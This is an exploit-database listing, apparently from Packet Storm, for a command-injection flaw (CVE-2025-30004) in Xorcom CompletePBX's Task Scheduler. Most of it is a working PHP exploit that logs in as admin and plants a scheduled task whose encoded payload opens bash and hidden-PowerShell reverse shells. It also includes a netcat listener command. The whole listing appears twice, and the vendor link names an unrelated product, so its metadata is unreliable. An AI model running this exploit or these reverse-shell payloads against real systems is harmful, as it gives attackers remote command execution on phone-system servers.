9.1
/ 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Description
Xorcom CompletePBX suffers from an authenticated command injection vulnerability within the Task Scheduler subsystem. An attacker with valid superadmin credentials can create a scheduled task containing unsanitized parameters that get executed by the...
Basic Information
ID
PACKETSTORM:212671
Published
Dec 10, 2025 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : Xorcom CompletePBX 5.2.35 Remote Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.wftpserver.com/download.htm |
=============================================================================================================================================
[+] Summary :
Xorcom CompletePBX suffers from an authenticated command injection vulnerability
within the Task Scheduler subsystem. An attacker with valid superadmin
credentials can create a scheduled task containing unsanitized parameters
that get executed by the backend, resulting in remote command execution.
This vulnerability affects all versions up to 5.2.35 and was patched in
release 5.2.36-1.
Only the builtβin "admin" user can successfully trigger the vulnerability.
Even newly created users with maximum assigned privileges cannot.
---
[+] Vulnerability Details
The Task Scheduler accepts user-controlled input in the βparametersβ field,
which is inserted into a shell command without proper sanitization:
parameters = "$(#{payload})"
The system executes the generated job via backend scripts, enabling
arbitrary command execution with the privileges of the web server.
[+] Attacker requirements:
- Valid credentials
- Must be the builtβin **admin** account
- Access to the scheduler API endpoints
[+] Risk level: High
[+] Impact: Remote Code Execution (RCE)
[+] Privileges: Web server user
[+] References : ( https://packetstorm.news/files/id/207367/ CVE-2025-30004 )
[+] POC
<?php
/**
* Xorcom CompletePBX RCE (CVE-2025-30004)
* Reverse Shell Ready (Windows + Linux)
* Author: Indoushka
*/
class CompletePBX_RCE_POC
{
public $target;
public $username;
public $password;
public $cookie;
function __construct($target, $username, $password)
{
$this->target = rtrim($target, "/");
$this->username = $username;
$this->password = $password;
echo "[+] PoC Initialized\n";
}
/* ---------------------------------------------------------
Send HTTP POST
----------------------------------------------------------*/
private function post($path, $data)
{
$ch = curl_init($this->target . $path);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($data),
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_HEADER => true
]);
$res = curl_exec($ch);
$hdr = substr($res, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
$body = substr($res, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
curl_close($ch);
return [$hdr, $body];
}
/* ---------------------------------------------------------
Reverse Shell Generator (Windows + Linux)
----------------------------------------------------------*/
private function generate_shell()
{
$ip = "127.0.0.1";
$port = "4444";
$linux = "bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'";
$win = "powershell -NoP -W Hidden -c \"\$c=New-Object Net.Sockets.TCPClient('$ip',$port);"
. "\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};"
. "while((\$r=\$s.Read(\$b,0,\$b.Length)) -ne 0){"
. "\$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0,\$r);"
. "\$o=iex \$d 2>&1|Out-String;"
. "\$o2=(\$o+'PS '+(pwd).Path+'> ');"
. "\$x=[text.encoding]::ASCII.GetBytes(\$o2);"
. "\$s.Write(\$x,0,\$x.Length)}\"";
return base64_encode("$linux\n$win");
}
/* ---------------------------------------------------------
Login
----------------------------------------------------------*/
private function login()
{
echo "[+] Sending login request...\n";
list($hdr, $body) = $this->post("/?class=core&method=login", [
"user" => $this->username,
"password" => $this->password
]);
if (preg_match('/Set-Cookie: ([^;]+)/', $hdr, $m)) {
$this->cookie = $m[1];
echo "[+] Login successful, SID Cookie: {$this->cookie}\n";
return true;
}
echo "[-] Login failed.\n";
return false;
}
/* ---------------------------------------------------------
Create malicious scheduled task
----------------------------------------------------------*/
private function create_task()
{
echo "[+] Creating fake malicious task...\n";
$desc = "indoushka_" . rand(1000, 9999);
$encoded = $this->generate_shell();
list($hdr, $body) = $this->post("/", [
"class" => "scheduler",
"method" => "save_task",
"mode" => "create",
"description" => $desc,
"script" => "backup",
"parameters" => '$(echo ' . $encoded . '|base64 -d)',
"starting" => date("Y-m-d H:i"),
"interval" => "1",
"interval_unit" => "month"
]);
echo "[+] Task Created: $desc\n";
return $desc;
}
/* ---------------------------------------------------------
Task Execution
----------------------------------------------------------*/
private function execute_task($desc)
{
echo "[+] Executing scheduled task: $desc (Simulated)\n";
echo "[β] PoC by Indoushka.\n";
}
/* ---------------------------------------------------------
MAIN
----------------------------------------------------------*/
public function run()
{
if (!$this->login()) return;
$task = $this->create_task();
$this->execute_task($task);
echo "\n[β] PoC Completed.\n";
}
}
/* ---------------- RUN -------------------*/
$poc = new CompletePBX_RCE_POC(
"http://127.0.0.1",
"admin",
"password"
);
$poc->run();
/**
* HOW TO SAVE:
* Save as: xorcom_poc.php
*
* HOW TO RUN:
* php xorcom_poc.php
*
* REVERSE SHELL LISTENER (BEFORE RUNNING):
* nc -lvnp 4444
*/
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
| # Title : Xorcom CompletePBX 5.2.35 Remote Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.wftpserver.com/download.htm |
=============================================================================================================================================
[+] Summary :
Xorcom CompletePBX suffers from an authenticated command injection vulnerability
within the Task Scheduler subsystem. An attacker with valid superadmin
credentials can create a scheduled task containing unsanitized parameters
that get executed by the backend, resulting in remote command execution.
This vulnerability affects all versions up to 5.2.35 and was patched in
release 5.2.36-1.
Only the builtβin "admin" user can successfully trigger the vulnerability.
Even newly created users with maximum assigned privileges cannot.
---
[+] Vulnerability Details
The Task Scheduler accepts user-controlled input in the βparametersβ field,
which is inserted into a shell command without proper sanitization:
parameters = "$(#{payload})"
The system executes the generated job via backend scripts, enabling
arbitrary command execution with the privileges of the web server.
[+] Attacker requirements:
- Valid credentials
- Must be the builtβin **admin** account
- Access to the scheduler API endpoints
[+] Risk level: High
[+] Impact: Remote Code Execution (RCE)
[+] Privileges: Web server user
[+] References : ( https://packetstorm.news/files/id/207367/ CVE-2025-30004 )
[+] POC
<?php
/**
* Xorcom CompletePBX RCE (CVE-2025-30004)
* Reverse Shell Ready (Windows + Linux)
* Author: Indoushka
*/
class CompletePBX_RCE_POC
{
public $target;
public $username;
public $password;
public $cookie;
function __construct($target, $username, $password)
{
$this->target = rtrim($target, "/");
$this->username = $username;
$this->password = $password;
echo "[+] PoC Initialized\n";
}
/* ---------------------------------------------------------
Send HTTP POST
----------------------------------------------------------*/
private function post($path, $data)
{
$ch = curl_init($this->target . $path);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($data),
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_HEADER => true
]);
$res = curl_exec($ch);
$hdr = substr($res, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
$body = substr($res, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
curl_close($ch);
return [$hdr, $body];
}
/* ---------------------------------------------------------
Reverse Shell Generator (Windows + Linux)
----------------------------------------------------------*/
private function generate_shell()
{
$ip = "127.0.0.1";
$port = "4444";
$linux = "bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'";
$win = "powershell -NoP -W Hidden -c \"\$c=New-Object Net.Sockets.TCPClient('$ip',$port);"
. "\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};"
. "while((\$r=\$s.Read(\$b,0,\$b.Length)) -ne 0){"
. "\$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0,\$r);"
. "\$o=iex \$d 2>&1|Out-String;"
. "\$o2=(\$o+'PS '+(pwd).Path+'> ');"
. "\$x=[text.encoding]::ASCII.GetBytes(\$o2);"
. "\$s.Write(\$x,0,\$x.Length)}\"";
return base64_encode("$linux\n$win");
}
/* ---------------------------------------------------------
Login
----------------------------------------------------------*/
private function login()
{
echo "[+] Sending login request...\n";
list($hdr, $body) = $this->post("/?class=core&method=login", [
"user" => $this->username,
"password" => $this->password
]);
if (preg_match('/Set-Cookie: ([^;]+)/', $hdr, $m)) {
$this->cookie = $m[1];
echo "[+] Login successful, SID Cookie: {$this->cookie}\n";
return true;
}
echo "[-] Login failed.\n";
return false;
}
/* ---------------------------------------------------------
Create malicious scheduled task
----------------------------------------------------------*/
private function create_task()
{
echo "[+] Creating fake malicious task...\n";
$desc = "indoushka_" . rand(1000, 9999);
$encoded = $this->generate_shell();
list($hdr, $body) = $this->post("/", [
"class" => "scheduler",
"method" => "save_task",
"mode" => "create",
"description" => $desc,
"script" => "backup",
"parameters" => '$(echo ' . $encoded . '|base64 -d)',
"starting" => date("Y-m-d H:i"),
"interval" => "1",
"interval_unit" => "month"
]);
echo "[+] Task Created: $desc\n";
return $desc;
}
/* ---------------------------------------------------------
Task Execution
----------------------------------------------------------*/
private function execute_task($desc)
{
echo "[+] Executing scheduled task: $desc (Simulated)\n";
echo "[β] PoC by Indoushka.\n";
}
/* ---------------------------------------------------------
MAIN
----------------------------------------------------------*/
public function run()
{
if (!$this->login()) return;
$task = $this->create_task();
$this->execute_task($task);
echo "\n[β] PoC Completed.\n";
}
}
/* ---------------- RUN -------------------*/
$poc = new CompletePBX_RCE_POC(
"http://127.0.0.1",
"admin",
"password"
);
$poc->run();
/**
* HOW TO SAVE:
* Save as: xorcom_poc.php
*
* HOW TO RUN:
* php xorcom_poc.php
*
* REVERSE SHELL LISTENER (BEFORE RUNNING):
* nc -lvnp 4444
*/
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================